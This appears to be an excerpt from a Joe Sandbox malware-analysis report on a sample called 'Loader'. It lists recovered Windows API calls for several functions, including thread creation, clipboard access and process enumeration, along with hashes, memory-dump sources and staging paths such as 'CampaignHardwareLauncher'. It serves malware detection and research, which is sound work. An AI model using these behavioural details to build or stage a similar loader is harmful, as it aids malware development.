                                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                                • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                                                • Opcode ID: 38b4acc354727a4c0417075670f91dc05251f42a4507735c69c00d05c80ce0cf
                                                                                                                                                                                                                                                                                                                • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38b4acc354727a4c0417075670f91dc05251f42a4507735c69c00d05c80ce0cf
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                                                                Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                                • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                                • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                                • Opcode ID: cc3be99d98a9ea92f75939d7095cd46bb936d2bea9b18232ff9af80ebaba2d6d
                                                                                                                                                                                                                                                                                                                • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc3be99d98a9ea92f75939d7095cd46bb936d2bea9b18232ff9af80ebaba2d6d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                                                Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B20B,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                                • String ID: F$A
                                                                                                                                                                                                                                                                                                                • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9e459585cd9081af2a55283011a588d55a41af3e2cd1d25bec4de129c5789268
                                                                                                                                                                                                                                                                                                                • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e459585cd9081af2a55283011a588d55a41af3e2cd1d25bec4de129c5789268
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                                                Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                                • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                                • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                                                Function 004024FB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll, xrefs: 00402646, 00402659
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658, xrefs: 004025BA
                                                                                                                                                                                                                                                                                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658$C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll$CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                                • API String ID: 542301482-3882326085
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                                • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                                                Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                                • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                                                Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                                • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                                                Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
